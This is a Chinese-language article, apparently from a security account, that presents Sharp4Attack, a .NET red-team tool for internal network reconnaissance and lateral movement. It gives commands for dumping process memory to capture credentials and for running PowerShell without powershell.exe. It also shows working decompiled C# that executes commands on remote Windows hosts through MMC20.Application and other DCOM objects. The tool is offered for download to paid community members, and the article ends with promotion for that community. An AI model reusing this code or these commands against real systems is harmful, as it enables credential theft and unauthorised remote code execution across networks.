.NET 一款融合内网收集和横向移动的工具

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他方面

02基本介绍

Sharp4Attack 是一个基于.NET实现的红队渗透工具，该工具提供了多种命令，可以执行远程命令、转储进程内存、查找本地管理员权限、获取域内计算机和用户信息、模拟系统账户权限等操作。

03基本用法

Sharp4Attack 内置提供了多种命令，比如dump进程凭据，可以运行如下命令：

Sharp4Attack.exe DumpProcess 728

默认在当前目录下生成一个output.bin文件。除此之外还可以执行不依赖Powershell.exe执行命令或者脚本。具体命令如下：
 

.\Sharp4Attack.exe PowerShell Get-Date

04功能实现

Sharp4Attack 是一款功能强大的工具，其中 DcomExec 模块通过 DCOM 对象在远程机器上执行命令。首先检查 RunParams 字典中是否包含键 "Method"。如果存在，则获取其对应的值 parameter2。接着，根据 parameter2 的第一个值 text 确定具体的 DCOM 方法，如下所示。

if (RunParams.TryGetValue("Method", out parameter2))
{
    string text = parameter2.Value[0];
    if (text != null)
    {
        if (text == "MMC20")
        {
            method = DCOM.DCOMMethod.MMC20_Application;
            goto IL_C0;
        }
        if (text == "ShellWindow")
        {
            method = DCOM.DCOMMethod.ShellWindows;
            goto IL_C0;
        }
        if (text == "ShellBrowserWindow")
        {
            method = DCOM.DCOMMethod.ShellBrowserWindow;
            goto IL_C0;
        }
        if (text == "ExcelDDE")
        {
            method = DCOM.DCOMMethod.ExcelDDE;
            goto IL_C0;
        }
    }
    Printing.Error(text + " is not a valid method");

Method根据不同的值分别指向MMC20_Application、ShellWindows、ShellBrowserWindow等DCOM。接着通过DCOM.DCOMExecute 方法传入参数执行命令。具体代码如下所示。

public static List<bool> DCOMExecute(List<string> ComputerNames, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOM.DCOMMethod Method = DCOM.DCOMMethod.MMC20_Application)
{
    return (from CN in ComputerNames
            select DCOM.DCOMExecute(CN, Command, Parameters, Directory, Method)).ToList<bool>();
}

跟进DCOMExecute方法可以看到通过 Activator.CreateInstance 方法创建一个 MMC20.Application 的 COM 对象实例，这里根据 ProgID 和计算机名获取类型。

object obj = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", ComputerName));

再通过一系列的反射调用，执行了ActiveView 对象的 ExecuteShellCommand 方法，实现了远程命令执行。完整调用代码如下所示。

object obj = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", ComputerName));
object obj2 = obj.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, obj, null);
object obj3 = obj2.GetType().InvokeMember("ActiveView", BindingFlags.GetProperty, null, obj2, null);
obj3.GetType().InvokeMember("ExecuteShellCommand", BindingFlags.InvokeMethod, null, obj3, new object[]
{
    Command,
    Directory,
    Parameters,
    "7"
});

通过上述代码和实现细节，Sharp4Attack 的 DcomExec 模块不仅灵活且强大，适用于渗透测试和红队。工具已经打包在星球，感兴趣的朋友可以加入自取。

05推荐阅读

从漏洞分析到安全攻防，我们涵盖了.NET安全各个关键方面，为您呈现最新、最全面的.NET安全知识，下面是公众号发布的精华文章集合，推荐大家阅读！

06.NET安全知识库

为了更好地应对基于.NET技术栈的风险识别和未知威胁，dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术，定位于高质量安全攻防星球社区，也得到了许多师傅们的支持和信任，通过星球深度连接入圈的师傅们，一起推动.NET安全高质量的向前发展。

每日分享.NET安全技术干货以及交流解答各类技术等问题，社区中发布很多高质量的.NET安全资源，可以说市面上很少见，都是干货。

20+个专题栏目涵盖了点、线、面、体等知识面，助力师傅们快速成长！其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    我们倾力打造专刊、视频等配套学习资源，循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

我们还有一个会员专属的内部星球陪伴群，加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问，以获取帮助迅速解决问题。